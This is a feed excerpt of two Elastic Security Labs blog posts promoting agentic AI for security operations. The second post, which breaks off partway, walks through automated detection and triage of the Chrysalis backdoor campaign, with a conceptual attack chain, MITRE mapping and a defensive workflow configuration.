<p>In a Security Operations Center (SOC), the team responsible for monitoring, detecting, and responding to cyber threats, agentic AI enables agents to gather context, analyze signals, take controlled actions, and learn from each outcome across triage, investigation, and response.</p>
<p>What began as “copilots” helping SOC analysts write queries is now evolving into autonomous systems capable of reasoning, acting, and adapting across complex investigations.</p>
<p>An agentic AI SOC differs from a traditional “copilot-only” SOC in three key ways:</p>
<ul>
<li>
<p><strong>Prioritization:</strong> Correlates multi-modal telemetry and adversary intent to identify complete attack chains rather than isolated alerts.</p>
</li>
<li>
<p><strong>Closed Loops:</strong> Moves beyond detection into containment, executing automated workflows and leveraging safe tool access to resolve threats at machine speed.</p>
</li>
<li>
<p><strong>Transparency:</strong> Provides traceable context and citations for every action, allowing SOC analysts to verify, trust, and override decisions. Without this, an agentic SOC would be a &quot;<strong>black box</strong>,&quot; making it impossible for analysts to verify, trust, or safely override decisions.</p>
</li>
</ul>
<p>By automating routine enrichment and research tasks, correlating alerts into meaningful attack chains, and executing safe response actions, agentic AI enables SOC analysts to focus on high-value investigations while maintaining full visibility and control.</p>
<h3><strong>Key Drivers Behind the Agentic AI Inflection Point</strong></h3>
<p>Three forces are driving the transition to agentic AI SOCs:</p>
<ul>
<li><strong>Scaling and standardization pressure:</strong> Many SOCs have experimented with AI agents but lack mature production practices. Leaders are enforcing architecture standards, governance controls, and operational policies to move beyond pilots.</li>
<li><strong>Escalating threat landscape:</strong> Attackers are using stealthier, multi-stage techniques,often AI-enhanced or even AI-created, that blend into legitimate activity and move faster than manual workflows can handle. SOCs must adopt autonomous, goal-driven systems to continuously correlate signals and respond at scale without losing control.</li>
<li><strong>Maturing ecosystem:</strong> Agentic attacks and defenses are evolving in parallel, creating demand for new SOC tooling, multi-agent visibility, and operational guardrails for safe, scalable deployment.</li>
</ul>
<p>These drivers make adopting an agentic AI SOC both operationally and economically compelling, enabling faster triage, more precise investigations, and automated response. Analysts can focus on validated, correlated attack activity instead of individual noisy alerts, while decisions remain evidence-based and transparent, allowing organizations to scale safely under real-world constraints.</p>
<h2><strong>Operationalizing an Agentic SOC: Challenges and Recommendations</strong></h2>
<p>Scaling autonomous AI agents across an enterprise SOC introduces operational, governance, and economic challenges. Below are key challenges and recommended approaches to address them:</p>
<table>
<thead>
<tr>
<th>Challenge</th>
<th>Recommendation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Early automation efforts target low-impact or low-noise tasks</td>
<td>Focus on high-volume, repetitive tasks such as risky LOLBins or failed logins, where automation delivers immediate ROI and reduces analyst workload.</td>
</tr>
<tr>
<td>Agents performing actions outside their intended scope</td>
<td>Treat agents as Non-Human Identities (NHIs), enforce least-privilege access to tools, and enforce requiring human approval for high-impact actions.</td>
</tr>
<tr>
<td>Agents behaving inconsistently or unpredictably</td>
<td>Treat prompts as code: version-control and rigorously test system prompts to ensure repeatable and reliable performance.</td>
</tr>
<tr>
<td>Overloading a single agent or fragmenting the SOC with multiple domain-specific agents</td>
<td>Deploy a unified agent that dynamically loads task-specific instructions and tools on demand, keeping the core system lightweight.</td>
</tr>
<tr>
<td>SOC analysts unsure of or unable to trust autonomous decisions</td>
<td>Prioritize explainability with RAG and transparent reasoning traces so every autonomous step is verifiable and grounded in evidence.</td>
</tr>
<tr>
<td>Costs growing uncontrollably as agent deployment scales</td>
<td>Implement per-agent budgets, rate limits, and usage monitoring to manage token consumption and tool invocation expenses.</td>
</tr>
<tr>
<td>Bloated system prompts increasing token costs and reducing agent accuracy.</td>
<td>Adopt an architecture where the agent pulls in targeted behavioral packages only when triggered by specific analyst intents or data context.</td>
</tr>
<tr>
<td>Agents or automation workflows being exploited by attackers</td>
<td>Continuously test defenses via red-team exercises against agents and prompts to proactively identify and remediate vulnerabilities such as prompt injection.</td>
</tr>
</tbody>
</table>
<h2><strong>The Elastic Blueprint: Essential Capabilities for an Agentic SOC</strong></h2>
<p>To move from manual intervention to an autonomous &quot;agentic loop,&quot; an enterprise-ready SOC must deliver measurable improvements across the entire triage -&gt; investigation -&gt; response lifecycle.</p>
<p>The following table outlines the essential elements of an agentic SOC platform and how Elastic Security operationalizes them:</p>
<table>
<thead>
<tr>
<th align="left">Elements</th>
<th align="left">What &quot;Good&quot; Looks Like in an Agentic SOC</th>
<th align="left">How Elastic Supports</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Enterprise Scalability</strong></td>
<td align="left">Continuously reason across hybrid-cloud and on-premises telemetry, scaling autonomous threat detection and response across large, distributed enterprises.</td>
<td align="left">Elastic Security provides <strong>unified visibility</strong> by ingesting data from any source, including cloud, identity, and endpoint, giving you a mature foundation for large-scale, automated enterprise defense. By consolidating all telemetry into a single platform, agents gain the broad visibility they need to reason across domains.</td>
</tr>
<tr>
<td align="left"><strong>Attack Prioritization</strong></td>
<td align="left"><strong>Prioritizing attacks</strong> over alerts by correlating signals to identify high-risk campaigns.</td>
<td align="left"><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery"><strong>Elastic Attack Discovery</strong></a> uses AI to filter out noise, correlating isolated events into a single coherent attack chain so SOC analysts can focus on the most critical threats.</td>
</tr>
<tr>
<td align="left"><strong>Accurate Detection</strong></td>
<td align="left"><strong>Faster and more accurate threat detection</strong> using behavioral baselines rather than static signatures.</td>
<td align="left"><a href="https://www.elastic.co/security-labs">Elastic Security Labs</a> provides expert-driven detection rules for emerging threats, while <a href="https://www.elastic.co/security/xdr"><strong>Elastic XDR</strong></a> stops attacks across endpoints and clouds. This defense leverages Elastic’s machine learning and entity analytics to detect behavioral anomalies beyond static signatures. It monitors user and host activity, correlates events across systems, and uses endpoint behavioral analysis to identify suspicious patterns in real time.</td>
</tr>
<tr>
<td align="left"><strong>Custom agent builder</strong></td>
<td align="left">Agents operate toward defined objectives with multi-step reasoning and controlled tool access.</td>
<td align="left"><strong><a href="https://www.elastic.co/elasticsearch/agent-builder">Elastic Agent Builder</a></strong> It enables the creation of custom AI agents by connecting tools such as ES</td>
</tr>
<tr>
<td align="left"><strong>Incident Response orchestration</strong></td>
<td align="left">Predictable execution for known scenarios, adaptive reasoning for complex ones, with analyst control at every stage.</td>
<td align="left"><a href="https://www.elastic.co/elasticsearch/workflows"><strong>Elastic Workflows</strong></a> handle the deterministic orchestration of triggers, sequencing, and response actions, while Agent Builder manages the AI reasoning. Seamlessly integrated, agents can call Workflows through conversations and Workflows can call Agents during orchestration. Human-in-the-loop controls ensure every automated step is backed by traceable evidence, allowing SOC analysts to override the system at any point.</td>
</tr>
<tr>
<td align="left"><strong>Flexible LLM Integration</strong></td>
<td align="left">A platform that <strong>supports your choice of LLM</strong> to avoid vendor lock-in and optimize for cost or privacy.</td>
<td align="left"><strong>Elastic</strong> offers choice and control by letting you bring your own LLM. You can use OpenAI, Amazon Bedrock, Google Gemini, or local models to drive autonomous reasoning while maintaining full data sovereignty. For customers who prefer a turnkey experience, Elastic provides managed LLMs out of the box, ensuring that the power of an agentic SOC is accessible regardless of your preferred infrastructure.</td>
</tr>
<tr>
<td align="left"><strong>Transparent Reasoning</strong></td>
<td align="left">Explanations with clear evidence trails and source links.</td>
<td align="left">In Elastic, agent reasoning provides a transparent trace of all tools used and decisions made, giving full visibility into the agent’s logic, while RAG (Retrieval-Augmented Generation) ensures every investigation is grounded in your organization’s internal knowledge, linked evidence, and includes source citations.</td>
</tr>
<tr>
<td align="left"><strong>Guarded autonomy</strong></td>
<td align="left">Explicitly permitted tools, confidence thresholds, RBAC, and controlled response scope.</td>
<td align="left"><strong>Elastic</strong> lets you control the level of autonomy for your agents by managing assigned tools, alongside user- and API-level permissions and RBAC.</td>
</tr>
</tbody>
</table>
<h2><strong>How Elastic’s Agentic AI Automates the LOLBins Hunt</strong></h2>
<p>It’s 9:15 AM. Your SOC dashboard shows zero &quot;Critical&quot; alerts, yet low-priority telemetry is flooding in. Among this noise, a stealthy process is running certutil.exe to download a base64-encoded payload from a suspicious domain. LOLBins, or Living off the Land Binaries, are legitimate system tools such as certutil.exe or powershell.exe that attackers weaponize. Because these tools are trusted and digitally signed, their malicious use often blends into normal activity and goes unnoticed.</p>
<p>In a <strong>traditional SOC</strong>, this activity would not trigger an immediate response. Instead, it would likely remain hidden until a separate catastrophic event - such as an appearance of a ransomware note - forced a manual hunt. An analyst would then have to painstakingly backtrack, sifting through proxy logs, running complex queries, and manually decoding strings to confirm that certutil.exe had been weaponized. By that time, the attacker has usually already achieved their objective.</p>
<p>In an <strong>Agentic SOC</strong>, the work is already done. The agent has detected, enriched, and confirmed the threat, created a case, and sent notifications, all before you’ve even had your coffee.</p>
<p>Let’s see how it’s done with Elastic.</p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
    &lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/rkno8LsFWls?si=l3GA40Yoq7hs9LQr&quot; title=&quot;YouTube video player&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h3><strong>Detection: Uncovering Hidden Threats</strong></h3>
<p>Elastic's Attack Discovery correlates multiple alerts to reveal a complete attack narrative. When certutil.exe executes in an unusual context, detection rules generate alerts, which Attack Discovery links with the originating phishing email and any related telemetry. The result is a unified story that shows not only the certutil.exe execution but also what the attacker attempted, how the payload was delivered, and the full sequence of malicious activity across the environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image5.png" alt="Attack Discovery showing correlated certutil events" /></p>
<h3><strong>Autonomous Enrichment: Gathering the Evidence</strong></h3>
<p>Elastic Workflows can invoke agents on a schedule (ex: nightly threat hunts) or in response to events (ex: a new Attack Discovery finding)  to operate automatically and gather evidence without human intervention.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image4.png" alt="Workflow that orchestrates agent call" /></p>
<p>When invoked, the agent investigates suspicious activity by analyzing file paths to identify malicious files, querying DNS logs to determine the IP resolution for the command-and-control domain, and searching firewall logs across clusters using ES|QL, Elastic’s piped query language, to confirm whether the traffic is allowed. This automated process allows the agent to collect and correlate critical signals across the environment without manual effort.</p>
<p>Every interaction with the agent is captured in a <strong>reasoning trace</strong>, recording each step the agent takes, including queries run, tools used, and enrichment results. This provides full transparency and auditability, and within the Agent Builder UI, SOC analysts can view these traces for complete visibility into how the agent reached its conclusions, the actions it performed, and the evidence it collected.</p>
<p>The screenshot below shows the reasoning trace of the agent and the tools it used during this investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image2.png" alt="Agent enriches detection with multiple data sources to validate potential malicious activity" /></p>
<h3><strong>Verdict &amp; Reasoning: Confirming the Threat</strong></h3>
<p>The agent checks VirusTotal for the second suspicious DLL, <strong>cdnver.dll</strong>, confirming its malicious classification and providing a verdict that this is a true positive.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image1.png" alt="Reasoning Trace showing evidence, risk score and verdict" /></p>
<h3><strong>Case Opened: Accelerating Resolution through Autonomous Action</strong></h3>
<p>Once confirmed, the agent automatically creates a case, maps the activity to MITRE ATT&amp;CK, and sends email notifications to stakeholders. SOC analysts receive a fully pre-investigated case rather than raw logs, allowing them to focus on remediation rather than investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/image3.png" alt="Case automatically created by the SOC agent" /></p>
<h3><strong>Behind the Scenes: Building the Agent</strong></h3>
<p>The agent’s autonomy and reasoning tasks stem from its initial setup in the <strong>Elastic Agent Builder</strong>. By predefining the tools it can use, the goals it must pursue, and the schedule it follows, the agent can operate independently while the SOC team focuses on strategic oversight.</p>
<p>This model works because it transforms the SOC from a reactive posture to a proactive one. Elastic’s Attack Discovery correlates alerts generated by detection rules into a coherent attack chain, ensuring that stealthy activity does not remain buried in low-priority noise. The agents then confirm true positives automatically and close the loop with immediate case creation and notifications, drastically reducing dwell time. Most importantly, every step is auditable and transparent, providing the traceable context SOC analysts need to maintain full confidence in AI-driven operations and intervene only when human judgment is required.</p>
<h2><strong>Agentic SOC with Elastic: Frequently Asked Questions</strong></h2>
<p><strong>Q: What is an Agentic AI SOC?</strong> <strong>A:</strong> It is an autonomous Security Operations Center where AI agents independently manage triage, investigation,response and other operational tasks. It shifts the focus from managing &quot;alerts&quot; to neutralizing &quot;attacks&quot; with minimal manual intervention.</p>
<p><strong>Q: Why should enterprises upgrade to an agentic model?</strong> <strong>A:</strong> Industry is at a practical inflection point where governance and agent frameworks have matured for enterprise production, offering a strategic window to scale defense against a rapidly evolving threat landscape.</p>
<p><strong>Q: How does an Agentic AI SOC differ from a traditional SOC or AI copilot?</strong> <strong>A:</strong> Autonomy. While a Copilot acts as a &quot;passenger&quot; that provides answers on command, an Agent is a &quot;driver&quot; that independently plans, executes, and coordinates complex investigations.</p>
<p><strong>Q: Do I need to know how to code to build and manage these agents?</strong> <strong>A:</strong> No. Elastic Agent Builder uses natural language to translate strategic intent into autonomous behavior, allowing practitioners to &quot;program&quot; threat hunting agents without writing code.</p>
<p><strong>Q: Q: Can an agent actually take response actions, like isolating a host?A:</strong> Yes. Through integration with Elastic Workflows, agents can execute &quot;guarded&quot; actions, such as host isolation or case creation, once they meet your pre-defined confidence thresholds, while giving SOC analysts the option to review or intervene before critical actions are taken.</p>
<p><strong>Q: Is every action taken by an autonomous agent auditable?</strong> <strong>A:</strong> Absolutely. Every decision is documented in a reasoning trace, providing a transparent audit trail that shows the exact logic, tools, and evidence the agent used.</p>
<h2><strong>External References</strong></h2>
<ul>
<li><a href="https://machinelearningmastery.com/7-agentic-ai-trends-to-watch-in-2026/">https://machinelearningmastery.com/7-agentic-ai-trends-to-watch-in-2026/</a></li>
<li><a href="https://www.marketsandmarkets.com/Market-Reports/ai-agents-market-15761548.html">https://www.marketsandmarkets.com/Market-Reports/ai-agents-market-15761548.html</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc/photo-edited-11@2x.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Speeding APT Attack Confirmation with Attack Discovery, Workflows, and Agent Builder]]></title>
            <link>https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder</link>
            <guid>speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder</guid>
            <pubDate>Wed, 18 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article walks through how Elastic Security's Attack Discovery, combined with Workflows and Agent Builder, can automatically detect, correlate, and confirm APT-level attacks like Chrysalis while reducing analyst response time from hours to minutes.]]></description>
            <content:encoded><![CDATA[<p><strong>9:15 AM: The Non-Event</strong> - A headline breaks: &quot;<a href="https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/">Chrysalis Backdoor: A Deep Dive into Lotus Blossom</a>.&quot; Your CISO sends a Slack message: &quot;Are we affected?&quot;</p>
<p>In a traditional SOC, you’re about to lose your entire morning to a manual scramble - sifting through dozens of alerts, writing queries, manually checking VirusTotal, and pivoting across index patterns to build a timeline hoping you don’t miss something.</p>
<p>But in an Agentic SOC, the work is already done. Attack Discovery, running on its hourly schedule, had already correlated 5 critical alerts out of 30+ into a single attack narrative: &quot;Malware with DLL Side-Loading Persistence.&quot; That discovery automatically triggered a workflow, which handed the findings to an agent. The agent used its tools and verified the malware hash on VirusTotal, searched your logs with ES|QL, checked the on-call schedule, created a case, and spun up a Slack incident channel with the on-call analyst already added, and also generated a CISO-ready summary — all before you sat down for coffee.</p>
<p>You reply to your CISO: &quot;Already confirmed and triaged. The case is open. Here's the link.&quot;</p>
<p>This post explains how we built that pipeline: the integration of <a href="https://www.elastic.co/security/ai">Attack Discovery</a>, <a href="https://www.elastic.co/elasticsearch/workflows">Workflows</a>, and <a href="https://www.elastic.co/elasticsearch/agent-builder">Agent Builder</a>.</p>
<h2>The threat: Chrysalis backdoor by Lotus Blossom</h2>
<h3>Threat actor profile</h3>
<table>
<thead>
<tr>
<th align="left">Attribute</th>
<th align="left">Details</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Name</strong></td>
<td align="left">Lotus Blossom (aka Billbug, Raspberry Typhoon, Spring Dragon)</td>
</tr>
<tr>
<td align="left"><strong>Origin</strong></td>
<td align="left">China (state-sponsored)</td>
</tr>
<tr>
<td align="left"><strong>Active Since</strong></td>
<td align="left">2009</td>
</tr>
<tr>
<td align="left"><strong>Motivation</strong></td>
<td align="left">Espionage</td>
</tr>
<tr>
<td align="left"><strong>Target Sectors</strong></td>
<td align="left">Government, Telecom, Aviation, Critical Infrastructure, Media</td>
</tr>
<tr>
<td align="left"><strong>Target Regions</strong></td>
<td align="left">Southeast Asia, Central America</td>
</tr>
</tbody>
</table>
<h3>Campaign overview</h3>
<p>Lotus Blossom executed a <strong>supply chain compromise</strong> of Notepad++ update infrastructure:</p>
<ul>
<li><strong>Attack Window:</strong> June 2025 – December 2025 (~6 months)</li>
<li><strong>Vector:</strong> Hijacked Notepad++ update mechanism (WinGUp)</li>
<li><strong>Method:</strong> Selective redirection of targeted users to malicious update servers</li>
<li><strong>Payload:</strong> Previously undocumented &quot;Chrysalis&quot; backdoor</li>
<li><strong>Discovery:</strong> Rapid7 MDR team, published 2026-02-02</li>
</ul>
<h3>Chrysalis backdoor capabilities</h3>
<p>The Chrysalis backdoor is a sophisticated, feature-rich implant:</p>
<ul>
<li>Custom encryption (LCG, FNV-1a hashing, MurmurHash)</li>
<li>Reflective DLL loading</li>
<li>API hashing for evasion</li>
<li>DLL sideloading via legitimate Bitdefender binary (<code>BluetoothService.exe</code>)</li>
<li>Full remote access capabilities</li>
<li>Persistent Windows service installation</li>
</ul>
<h3>Attack chain</h3>
<pre><code>[1] INITIAL ACCESS
    └── User executes malicious NSIS installer from Desktop
              ↓
[2] EXECUTION
    └── Installer drops files to hidden AppData folder
        ├── BluetoothService.exe (legitimate binary)
        └── log.dll (malicious Chrysalis loader)
              ↓
[3] PERSISTENCE
    └── BluetoothService.exe registered as Windows service
        └── Runs under SYSTEM context
              ↓
[4] DEFENSE EVASION
    └── DLL sideloading via legitimate signed binary
              ↓
[5] COMMAND &amp; CONTROL
    └── DNS beacon to api[.]skycloudcenter[.]com ✅ CONFIRMED
</code></pre>
<h3>MITRE ATT&amp;CK mapping</h3>
<table>
<thead>
<tr>
<th align="left">Tactic</th>
<th align="left">Technique</th>
<th align="left">ID</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Initial Access</td>
<td align="left">Supply Chain Compromise</td>
<td align="left">T1195.002</td>
</tr>
<tr>
<td align="left">Execution</td>
<td align="left">User Execution</td>
<td align="left">T1204.002</td>
</tr>
<tr>
<td align="left">Persistence</td>
<td align="left">Windows Service</td>
<td align="left">T1543.003</td>
</tr>
<tr>
<td align="left">Defense Evasion</td>
<td align="left">DLL Side-Loading</td>
<td align="left">T1574.002</td>
</tr>
<tr>
<td align="left">Command &amp; Control</td>
<td align="left">DNS</td>
<td align="left">T1071.004</td>
</tr>
</tbody>
</table>
<h2>The Challenge: Speed vs. Accuracy</h2>
<p>When threat intelligence drops on a nation-state APT campaign, SOC teams face a brutal trade-off:</p>
<p><strong>Speed:</strong> Executives want answers <em>now</em>. &quot;Are we compromised?&quot;</p>
<p><strong>Accuracy:</strong> Analysts need time to hunt, correlate, and confirm before making the call.</p>
<p>Traditional workflows require analysts to:</p>
<ol>
<li>Determine the scope of analysis and relevant search criteria</li>
<li>Manually search for IOCs across multiple data sources</li>
<li>Correlate alerts that may span days or weeks</li>
<li>Validate findings against threat intelligence</li>
<li>Build the attack timeline</li>
<li>Escalate with confidence</li>
</ol>
<p>This process takes <strong>hours to days</strong>, during which an active attacker may exfiltrate data or move laterally.</p>
<h2>The Solution: Attack Discovery + Workflows + Agent Builder</h2>
<p>Elastic Security's AI-powered automation stack transforms this workflow from manual hunting to <strong>automated confirmation</strong>. But before we dive into the specific setup, it's worth understanding how the building blocks fit together.</p>
<h3>Agents &amp; Workflows: Two entry points, one composable architecture</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image7.png" alt="Diagram showing the composable relationship between Agents and Workflows" /></p>
<p>Agent Builder gives you two primitives that work together:</p>
<ul>
<li><a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder"><strong>Agents</strong></a> are the intelligence layer. They reason about a task, decide which tools to call, and adapt based on what they find. An agent can call search tools, MCP tools, and critically - <strong>workflows as tools</strong>.</li>
<li><a href="https://www.elastic.co/docs/explore-analyze/workflows"><strong>Workflows</strong></a> are the structure layer. They're deterministic pipelines: steps run in order, reliably and repeatably. Any step in a workflow can optionally be an <strong>agent step</strong>, giving it the ability to reason mid-pipeline.</li>
</ul>
<p>The two are fully composable. A workflow can invoke an agent. An agent can call a workflow. An agent step inside a workflow can call another workflow. Every connection is optional allowing you to mix and match based on what the problem demands.</p>
<p>This is what makes the architecture powerful: <strong>agents reason and decide; workflows execute and coordinate</strong>. For our Chrysalis attack scenario, we used both.</p>
<h3>Our Flow</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image10.png" alt="" /></p>
<p><strong>The Flow:</strong></p>
<ol>
<li><strong>Many Alerts</strong> → Attack Discovery correlates disparate alerts into a single attack narrative</li>
<li><strong>Attack Discovery</strong> → Generates an alert that triggers the workflow</li>
<li><strong>Workflow</strong> → Invokes Agent Builder to analyze the attack discovery findings</li>
<li><strong>Agent Builder</strong> → Calls enrichment workflows (VirusTotal, Threat Intel, ES|QL queries)</li>
<li><strong>Agent Builder Calls a Workflow</strong> → Agent builder continues with incident response actions calling on workflow as a tool (case actions, isolate host, notify team)</li>
</ol>
<h2>Step 1: Attack Discovery surfaces the threat</h2>
<p>Attack Discovery uses LLMs to analyze security alerts and identify attack patterns. Unlike traditional alert grouping, it understands the <strong>semantic relationships</strong> between alerts.</p>
<h3>The alert queue: Needle in a haystack</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image4.png" alt="Shows the raw Elastic Security alerts table with dozens of alerts across different rules, severities, hosts, and users." /></p>
<p>Here's reality for a SOC analyst. You open the alerts page and see dozens of alerts across multiple hosts, users, and rules, combination of, mixed severities, mixed types, many of them noise.</p>
<p>Dozens of alerts. Multiple rules firing. Severity levels ranging from low to critical. Some are the Chrysalis attack. Some are unrelated Windows Defender events. Some are SIEM change detections from a completely different workflow. It’s difficult to find the coordinated attack in this wall of noise.</p>
<h3>What Attack Discovery found</h3>
<p>Attack Discovery analyzed all of these alerts and identified <strong>5 alerts</strong> that belonged to a single coordinated attack - pulling them out of the noise and correlating them into one narrative:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image6.png" alt="Shows the Attack Discovery showing a summary of the correlated attack" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image11.png" alt="Shows the Attack Discovery view with the correlated attack: 5 alerts, all critical, tied to a host and user." /></p>
<p>Instead of presenting 5 individual alerts, Attack Discovery correlated them into a single discovery:</p>
<p><strong>Malware with DLL Side-Loading Persistence</strong></p>
<p>Malicious executable on <code>srv-win-defend-01</code> escalated to persistence via <code>BluetoothService.exe</code> with DLL side-loading</p>
<ul>
<li><strong>Host:</strong> srv-win-defend-01</li>
<li><strong>User:</strong> james_spiteri</li>
<li><strong>Severity:</strong> Critical</li>
<li><strong>Attack Chain:</strong> Initial Access → Execution → Persistence → Defense Evasion → C2</li>
</ul>
<p>Attack Discovery also:</p>
<ul>
<li>Mapped alerts to MITRE ATT&amp;CK tactics</li>
<li>Identified the DLL sideloading technique</li>
<li>Flagged the suspicious persistence mechanism</li>
<li>Highlighted the C2 network indicator</li>
</ul>
<h2>Step 2: Scheduled discovery triggers the workflow</h2>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image2.png" alt="Shows Attack Discovery’s scheduling page where users can schedule attack discovery to run at desired intervals." /></p>
<p>Attack Discovery doesn't require an analyst to click a button. We configured it to run on an <a href="https://www.elastic.co/docs/api/doc/serverless/operation/operation-createattackdiscoveryschedules"><strong>hourly schedule</strong></a>, continuously analyzing the latest alerts for coordinated attacks.</p>
<p>When our hourly run kicked off, it ingested all alerts from the last hour including the Chrysalis-related alerts buried among routine detections and surfaced the DLL side-loading attack as a discovery.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder/image8.png" alt="Shows Attack Discovery schedule editor linked to specific workflows." /></p>
<p>Linking a workflow as an action step from attack discovery means every time Attack Discovery finds a coordinated attack, it automatically fires the workflow..</p>
<p>But here's what makes this approach different from traditional SOAR playbooks: the workflow doesn't script out every step. It hands the entire attack discovery to Agent Builder and says <em>&quot;figure it out.&quot;</em></p>
<h3>Workflow definition</h3>
<p>This is the real workflow we used consisting of two steps, that's it:</p>
<pre><code>name: Auto Triage AD
description: &gt;-
  Demonstrates the application of AI agents and workflows 
  to enable agentic alert triaging.
enabled: true
tags:
  - Example
  - Agentic Workflow

triggers:
  - type: alert                          # Fires when Attack Discovery generates an alert

steps:
  # Step 1: Hand the attack discovery to the agent with clear instructions
  - name: initial_analysis
    type: kibana.request
    with:
      method: &quot;POST&quot;
      path: &quot;/api/agent_builder/converse&quot;
      headers:
        kbn-xsrf: &quot;true&quot;
      body:
        agent_id: &lt;your-agent-id&gt;        # Your custom Hunting Agent
        input: |
          Confirm the attack by searching for behaviour in the logs 
          (all logs which are relevant), always leverage security labs tools, 
          always leverage virustotal if file hashes are available. 
          If this is a true positive, create a case with all the relevant content too.

          {{event|json}}

          Create a slack channel for this incident, check who's on call, 
          add them to it, and send a formatted message with what's happening 
          and next steps. If this is a true positive, create a case with all 
          the relevant content too - add a button to the slack message linking 
          to the case, and another button leading to the result of the attack. 
          Lastly, include a button that will take me to this agent conversation, 
          just replace the conversation ID with the actual one from this conversation 
          (https://&lt;your-kibana-url&gt;/app/agent_builder/conversations/&lt;conversation-id&gt;)

          Change the attack discovery status to acknowledged, or, 
          if false positives, close it.
    timeout: 10m
    on-failure:
      retry:
        max-attempts: 3

  # Step 2: Follow up to catch anything that didn't complete
  - name: followup_analysis
    type: kibana.request
    with:
      method: &quot;POST&quot;
      path: &quot;/api/agent_builder/converse&quot;
      headers:
        kbn-xsrf: &quot;true&quot;
      body:
        conversation_id: &quot;{{ steps.initial_analysis.output.conversation_id }}&quot;
        agent_id: &lt;your-agent-id&gt;
        input: |
          Complete any previous steps which might not have ran successfully. 
          Just in case, the conversation ID is 
          {{ steps.initial_analysis.output.conversation_id }}
    timeout: 10m
    on-failure:
      retry:
        max-attempts: 3
</code></pre>
<h3>Why this workflow is so short</h3>
<p>The entire automation is <strong>two steps</strong>:</p>
<ol>
<li><strong><code>initial_analysis</code></strong>: Send the attack discovery to Agent Builder with natural language instructions describing what you want done</li>
<li><strong><code>followup_analysis</code></strong>: A failsafe that resumes the same conversation and asks the agent to verify all tasks were completed. Because agents call multiple tools in sequence and any individual tool call could time out or hit a transient error, this step ensures nothing falls through the cracks.</li>
</ol>
<p>This is the fundamental shift: <strong>the workflow is the trigger and the safety net; the agent is the brain</strong>.</p>
<h2>Under the hood: How we extended the Threat Hunting Agent</h2>
<p>Before we continue with the results, it's worth pausing on what made this possible. One of Agent Builder's most powerful capabilities is that you can <strong>extend existing agents</strong> with additional tools. Rather than building from scratch, we took the default <strong>Threat Hunting Agent</strong> and added custom workflow-backed tools to give it the specific capabilities this scenario required.</p>
<h3>What we added</h3>
<p>Agent Builder ships with built-in platform tools like <code>platform.core.generate_esql</code> and <code>platform.core.product_documentation</code>. But the real power comes from adding your own. We extended the Threat Hunting Agent with tools across several categories:</p>
<table>
<thead>
<tr>
<th align="left">Tool</th>
<th align="left">Type</th>
<th align="left">What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>vt.hash.lookup</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Analyze a file hash with VirusTotal</td>
</tr>
<tr>
<td align="left"><code>check.on.call.schedule</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Query the on-call schedule to find the current responder</td>
</tr>
<tr>
<td align="left"><code>create.case</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Create a case in Elastic Security</td>
</tr>
<tr>
<td align="left"><code>create.channel</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Create a Slack channel for incident coordination</td>
</tr>
<tr>
<td align="left"><code>get.time</code></td>
<td align="left">Workflow (custom)</td>
<td align="left">Get the current time for naming and timestamps</td>
</tr>
</tbody>
</table>
<p>Five custom tools. That's all it took to turn the default Hunting Agent into automatically verifying malware, searching logs, finding the on-call responder, creating a case, and spinning up an incident channel - all expediting the time to detect a potential threat.</p>
<h3>The Agent's reasoning chain</h3>
<p>Here's what's remarkable: given the Attack Discovery context, the agent automatically decided which tools to call and in what order. No human scripted these steps.</p>
